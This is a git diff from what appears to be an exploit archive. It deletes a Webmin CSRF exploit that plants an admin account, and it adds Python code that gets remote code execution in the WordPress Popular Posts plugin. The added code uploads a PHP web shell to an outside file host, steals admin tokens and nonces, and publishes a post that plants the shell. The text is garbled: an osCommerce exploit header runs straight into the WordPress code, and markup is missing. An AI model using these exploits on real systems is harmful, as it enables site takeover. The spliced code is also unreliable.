diff --git a/exploits/linux/webapps/50126.py b/exploits/linux/webapps/50126.py deleted file mode 100755 index 30c9c6946..000000000 --- a/exploits/linux/webapps/50126.py +++ /dev/null @@ -1,230 +0,0 @@ -# Exploit Title: Webmin 1.973 - Cross-Site Request Forgery (CSRF) -# Date: 24/04/2021 -# Exploit Author: *Mesh3l_911 & Z0ldyck -# Vendor Homepage: https://www.webmin.com -# Repo Link: https://github.com/Mesh3l911/CVE-2021-31762 -# Version: Webmin 1.973 -# Tested on: All versions <= 1.973 -# CVE : CVE-2021-31762 -# POC: https://youtu.be/qCvEXwyaF5U - - -import time, subprocess - -print('''\033[1;37m - - __ __ _ ____ _ _________ _ _ _ -| \/ | | | |___ \| | |___ / _ \| | | | | | -| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ -| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / -| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < -|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ - __/ | - |___/ - - \033[1;m''') - -for i in range(101): - print( - "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( - i), "\033[1;36m%\033[1;m", end="") - time.sleep(0.02) -print("\n\n") - -target = input( - "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") - -if target.endswith('/'): - target = target + 'acl/save_user.cgi' -else: - target = target + '/acl/save_user.cgi' - - -def CSRF_Generator(): - with open('CSRF_POC.html', 'w') as POC: - POC.write \ - (''' - - -
- - - - - - - - - - - ''') - POC.close() - - print( - "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m") - - - -def main(): - CSRF_Generator() - - -if __name__ == '__main__': - main() \ No newline at end of file diff --git a/exploits/php/webapps/50128.py b/exploits/php/webapps/50128.py new file mode 100755 index 000000000..012c61cfb --- /dev/null +++ b/exploits/php/webapps/50128.py @@ -0,0 +1,89 @@ +# Exploit Title: osCommerce 2.3.4.1 - Remote Code Execution (2) +# Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin +# Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php +# Notes: The RCE doesn't need to be authenticated +# Date: 26/06/2021 +# Exploit Author: Bryan Leong' + +print('') +print('[*] Starting Exploit:') + +''' +Upload file +''' +file_json = requests.post('https://api.bayfiles.com/upload', files={ 'file' : (shell_name, payload)}) +resp = json.loads(file_json.text) +if resp['status']: + urlshort = resp['data']['file']['url']['full'] +else: + print(f'[-] Error:'+ resp['error']['message']) + exit() + +file_uploaded_site = requests.get(urlshort).text +PHP_URL = re.findall(r"(https?://\S+)("+shell_name+")",file_uploaded_site)[0][0] + shell_name + +print(f'[+] Web Shell successfully uploadad at [{PHP_URL}].') + +''' +Authentication: +''' +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' + +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Monies Browser 1.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'log': username, + 'pwd': password, + 'wp-submit': 'Log In', + 'testcookie': '1' +} + +# Authenticate: +auth = session.post(auth_url, headers=header, data=body) +auth_header = auth.headers['Set-Cookie'] +if 'wordpress_logged_in' in auth_header: + print(f'[+] Authentication successfull as user [{username}] !') +else: + print('[-] Authentication failed ! Check username and password') + exit() + +''' +Verify that the requirements are installed +''' +settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=debug' +settings_page = session.get(settings_page_url).text +search_string = ' gd' +if settings_page.find(search_string) == -1 : + print('[-] Error, gd extension for PHP is not installed/enabled on the server ! WPP can\'t generate thumbnails.') + exit() + +''' +Get the wpp-admin-token +''' +settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools' + +settings_page = session.get(settings_page_url).text +search_string = '' +settings_page = settings_page[settings_page.find(search_string):] +wpp_admin_token = settings_page[72: settings_page.find(search_string_end)] +if wpp_admin_token: + print(f'[+] Acquired wpp-admin-token [{wpp_admin_token}].') +else: + print('[-] Error while gathering wpp-admin-token !') + exit() + +''' +Apply changes to the Popular Posts plugin +''' +body = { + 'upload_thumb_src': '', + 'thumb_source': 'custom_field', + 'thumb_lazy_load': 1, + 'thumb_field': 'wpp_thumbnail', + 'thumb_field_resize': 1, + 'section': 'thumb', + 'wpp-admin-token': wpp_admin_token +} +applied_changes = session.post(settings_page_url, headers=header, data=body).text +if applied_changes.find('
Settings saved.'):
+ print(f'[+] Settings applied successfully to the Popular Posts plugin. ')
+else:
+ print('[-] Error while applying settings o the Popular Posts plugin!')
+ exit()
+
+'''
+Empty image cache
+'''
+body = {
+ 'action': 'wpp_clear_thumbnail',
+ 'wpp-admin-token': wpp_admin_token
+}
+applied_changes = session.post(settings_page_url, headers=header, data=body).text
+print(f'[+] Images cache cleared. ')
+
+
+'''
+Get the new post ID and Nonce
+'''
+new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/post-new.php'
+
+new_post_page = session.get(new_post_url).text
+search_string = 'name="_ajax_nonce-add-meta" value="'
+search_string_end = '" />'
+new_post_page = new_post_page[new_post_page.find(search_string)+35:]
+ajax_nonce = new_post_page[:new_post_page.find(search_string_end)]
+
+search_string = 'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "'
+search_string_end = '" );'
+new_post_page = new_post_page[new_post_page.find(search_string)+66:]
+wp_nonce = new_post_page[:new_post_page.find(search_string_end)]
+
+search_string = '},"post":{"id":'
+search_string_end = ','
+new_post_page = new_post_page[new_post_page.find(search_string)+15:]
+post_ID = new_post_page[:new_post_page.find(search_string_end)]
+
+if post_ID and wp_nonce and ajax_nonce:
+ print(f'[+] Acquired new post ID [{post_ID}], WP Nonce [{wp_nonce}] and AJAX Nonce [{ajax_nonce}].')
+else:
+ if not post_ID: print('[-] Error while gathering post_ID !')
+ elif not wp_nonce: print('[-] Error while gathering Wordpress Nonce !')
+ elif not ajax_nonce : print('[-] Error while gathering Wordpress AJAX Nonce !')
+ exit()
+
+'''
+Publish a new post
+'''
+new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wp/v2/posts/'+post_ID+'?_locale=user'
+
+data = {"id":post_ID,"title":"I'm the one who knocks","content":"\n upgrade your plugins Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/wordpress-popular-posts/' + post_ID +'_'+ shell_name)
+print('')
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b9ebb371d..0312d7284 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -26042,7 +26042,6 @@ id,file,description,date,author,type,platform,port
12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php,
12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php,
12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php,
-50126,exploits/linux/webapps/50126.py,"Webmin 1.973 - Cross-Site Request Forgery (CSRF)",2021-07-14,Mesh3l_911,webapps,linux,
49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",2021-01-18,"Aitor Herrero",webapps,php,
49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",2021-01-18,"Aitor Herrero",webapps,php,
49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",2021-01-19,"Talat Mehmood",webapps,php,
@@ -44263,3 +44262,5 @@ id,file,description,date,author,type,platform,port
50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",2021-07-13,"Alexandre ZANNI",webapps,php,
50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",2021-07-13,"Luca Bernardi",webapps,php,
50127,exploits/php/webapps/50127.txt,"WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)",2021-07-14,"Vikas Srivastava",webapps,php,
+50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",2021-07-15,"Bryan Leong",webapps,php,
+50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",2021-07-15,"Simone Cristofaro",webapps,php,